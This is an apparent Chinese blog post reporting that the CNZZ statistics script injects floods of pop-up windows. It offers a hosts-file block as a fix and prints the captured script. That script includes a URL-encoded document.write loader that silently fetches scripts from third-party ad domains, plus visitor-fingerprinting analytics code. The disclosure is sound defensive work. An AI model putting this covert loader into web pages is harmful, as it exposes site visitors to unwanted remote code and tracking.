CNZZ统计发现超级弹窗,弹出窗口超过10个,弹窗问题解决办法

最近发现avast经常报毒,报毒地址为s16.cnzz com/stat.php,显然这个是统计代码,开始没有在意,后来发现浏览器弹窗越来越多,一次能弹出十多个。分析了好久,一直没找到原因,不厌其烦,经常导致浏览器崩溃甚至电脑死机。
今天发狠了要找出这个js木马地址。打开中国站长站,出现弹窗,刷新之后不再出现。毫无因为,从cookie下手。cookie里面只有站长站自己的cookie和cnzz的cookie。删掉cnzz,刷新,弹窗果然出现了。简直不敢相信,重复3次,确认是cnzz统计挂马。
解决
打开c:\Windows\System32\drivers\etc\hosts  
最后一行添加127.0.0.1 s16.cnzz.com
如果自己站有cnzz代码,速度删掉吧,太恶劣了。


附上代码:

http://s16.cnzz.com/stat.php?id=1444&web_id=1444

document.writeln("<div style=\'display:none\'>");
if(document.cookie.indexOf('20130813')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='20130813=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//p1.0817tt.com/fshow.php%3Fid%3D193777%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%20charset%3D%22utf-8%22%20src%3D%22http%3A//s.9158918.com/AShow.aspx%3FAID%3D17693%22%3E%3C/script%3E%0A%3Cscript%20src%3D%22http%3A//js.unionbig.com/p.php%3Fpid%3D33242%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//cbjs.baidu.com/js/m.js%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3EBAIDU_CLB_fillSlot%28%22770667%22%29%3B%3C/script%3E'));}
document.writeln("</div>");

;(function(global){
	global.Ta=global.Ta||{};
	Ta.hack=function(){
		return {params:'',
		conf:{sid:25815551,pf:1,logo:255,hot:{}}		};
	};
})(this);

(function(g,t){function y(d){return(d=document.cookie.match(RegExp("(?:^|;\\s)"+d+"=(.*?)(?:;\\s|$)")))?d[1]:""}function z(d,a,b){d=d+"="+a+";path=/;domain=";a=window.location.host;var c={"com.cn":1,"net.cn":1,"gov.cn":1,"com.hk":1},e=a.split(".");2<e.length&&(a=(c[e.slice(-2).join(".")]?e.slice(-3):e.slice(-2)).join("."));document.cookie=d+a+(b?";expires="+b:"")}function u(d){var a,b,c,e={};void 0===d?(c=window.location,d=c.host,a=c.pathname,b=c.search.substr(1),c=c.hash):(c=d.match(/\w+:\/\/((?:[\w-]+\.)+\w+)(?:\:\d+)?(\/[^\?\\\"\'\|\:<>]*)?(?:\?([^\'\"\\<>#]*))?(?:#(\w+))?/i)||
[],d=c[1],a=c[2],b=c[3],c=c[4]);if(b)for(var g=b.split("&"),l=0,q=g.length;l<q;l++)if(-1!=g[l].indexOf("=")){var n=g[l].indexOf("="),p=g[l].slice(0,n),n=g[l].slice(n+1);e[p]=n}return{host:d,path:a,search:b,hash:c,param:e}}function A(d){return(d||"")+Math.round(2147483647*(Math.random()||0.5))*+new Date%1E10}function B(d,a){var b=document.createElement("script"),c=document.getElementsByTagName("script")[0];b.src=d;b.type="text/javascript";b.οnlοad=b.οnerrοr=b.onreadystatechange=function(){/loaded|complete|undefined/.test(b.readyState)&&
(b.οnlοad=b.οnerrοr=b.onreadystatechange=null,b.parentNode.removeChild(b),b=void 0,a())};c.parentNode.insertBefore(b,c)}function x(d){d=d||{};if(d.conf){var a=d.conf,b;for(b in a)a.hasOwnProperty(b)&&(g[b]=a[b])}if(g.sid&&!Ta[g.sid]){a=[];b=0;var c=u(),c={dm:c.host,pvi:"",si:"",url:c.path,arg:encodeURIComponent(c.search||""),ty:1},e=y("pgv_pvi");e||(c.ty=0,e=A(),z("pgv_pvi",e,"Sun, 18 Jan 2038 00:00:00 GMT;"));c.pvi=e;e=y("pgv_si");e||(e=A("s"),z("pgv_si",e));c.si=e;var e=u(document.referrer),s=u(),
e={rdm:e.host,rurl:e.path,rarg:encodeURIComponent(e.search||""),adt:s.param.ADTAG||s.param.adtag},s={r2:g.sid,r3:"undefined"==typeof _speedMark?"-1":new Date-_speedMark,r4:g.pf||1},l;a:{try{var w=navigator,n=screen||{width:"",height:"",colorDepth:""},p=document.body,t=n.width+"x"+n.height,x=n.colorDepth+"-bit",E=(w.language||w.userLanguage).toLowerCase(),F=w.javaEnabled()?1:0,G=(new Date).getTimezoneOffset()/60,n="";p.addBehavior&&(p.addBehavior("#default#clientCaps"),n=p.connectionType);var p={fl:"",
scr:t,scl:x,lg:E,jv:F,tz:G,ct:n},m,j,f;if((l=w.plugins)&&(m=l.length))for(f=0;f<m;f++){if(j=l[f].description.match(/Shockwave Flash ([\d\.]+) \w*/))p.fl=j[1]}else f=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash")).GetVariable("$version"),p.fl=f.replace(/^.*\s+(\d+)\,(\d+).*$/,"$1.$2")}catch(I){l={};break a}l=p}m={};if("undefined"!=typeof _taadHolders&&0<_taadHolders.length){j=0;f=_taadHolders;for(p=f.length;j<p;j++)m[f[j]]=m[f[j]]?m[f[j]]+1:1}j=[];for(var v in m)m.hasOwnProperty(v)&&j.push(v+
"*"+m[v]);v={ext:"adid="+j.join(":")};var h;m=[];for(h in q)j=y(q[h].c_id),"afs"==h?f=(f=/ssid=([^&]*)/i.exec(u().hash))&&f[1]?f[1]:"":(f=u().param,f=f[q[h].id]?f[q[h].id]:""),f?(m.push("ty="+q[h].key+";ck=0;id="+f),j=new Date,j.setTime(j.getTime()+2592E6),z(q[h].c_id,f,j.toGMTString())):j&&m.push("ty="+q[h].key+";ck=1;id="+j);h={pf:m.join("|")};h=[c,e,s,l,v,h,{random:+new Date}];for(c=h.length;b<c;b++)for(var k in h[b])h[b].hasOwnProperty(k)&&a.push(k+"="+(h[b][k]||""));d.params&&a.push(d.params);
var C=Ta.src=("https:"==document.location.protocol?"https://pingtas":"http://pingtcss")+".qq.com/pingd?"+a.join("&"),r=new Image;Ta[g.sid]=r;r.οnlοad=r.οnerrοr=r.οnabοrt=function(){r=r.οnlοad=r.οnerrοr=r.οnabοrt=null;Ta[g.sid]=!0};r.src=C;if(1*!g.pf||g.hot.isValid){d=window.location;k=d.host+d.pathname;var H=d.pathname,D=function(){B("http://imgcache.qq.com/bossweb/ta/scripts/ping_hotclick_min.js",function(){window.hotclick&&(new hotclick(C)).watchClick()})};if(1*g.pf)RegExp(k).test(g.hot.url)&&D();
else{k=g.sid;d="http://tcss.qq.com/heatmap/"+k%100+"/";k+="";h=k.length;b=0;for(a="";b<h;){c=k.charCodeAt(b++)&255;if(b==h){a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(c>>2);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt((c&3)<<4);a+="==";break}e=k.charCodeAt(b++);if(b==h){a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(c>>2);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt((c&3)<<
4|(e&240)>>4);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt((e&15)<<2);a+="=";break}s=k.charCodeAt(b++);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(c>>2);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt((c&3)<<4|(e&240)>>4);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt((e&15)<<2|(s&192)>>6);a+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(s&63)}B(d+
a+".js?random="+ +new Date,function(){var a;if(window._Cnf&&(a=window._Cnf.url)){a=a.split("|");for(var b=0;b<a.length;b++)if(a[b]==H){D();break}}})}}g.logo&&255!=g.logo&&(d=g.logo,k={9:"\u817e\u8baf\u5206\u6790",10:"\u7f51\u7ad9\u7edf\u8ba1",df:'<img src="http://tcss.qq.com/icon/toss_'+d+'.gif" border="0" />'},document.write(['<a href="http://ta.qq.com?ADTAG=FROUM.FOOTER.CLICK.ICON" title="\u817e\u8baf\u5206\u6790" target="_blank">',k[d]||k.df,"<a>"].join("")))}}var q={afs:{key:1,id:"ssid",c_id:"pgv_afsid",
fr:"hash"},afc:{key:2,id:"__tacid",c_id:"pgv_afcid",fr:"param"},gdt:{key:11,id:"qz_gdt",c_id:"pgv_gdtid",fr:"param"}};t.pgvSendClick=function(d,a){var b=Ta.src.replace(/ext=[^&]*/,function(){return"ext="+("evtid"==a?"ty=0;evtid=":"adid=")+d}).replace(/r2=([^&]*)/,function(a,b){return"r2=a"+b});(new Image(1,1)).src=b};t.Ta=t.Ta||{};Ta.pgv=x;!Ta.async&&x(Ta.hack?Ta.hack():"")})({sid:"",pf:"",hot:{url:"",isValid:!1}},this);


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值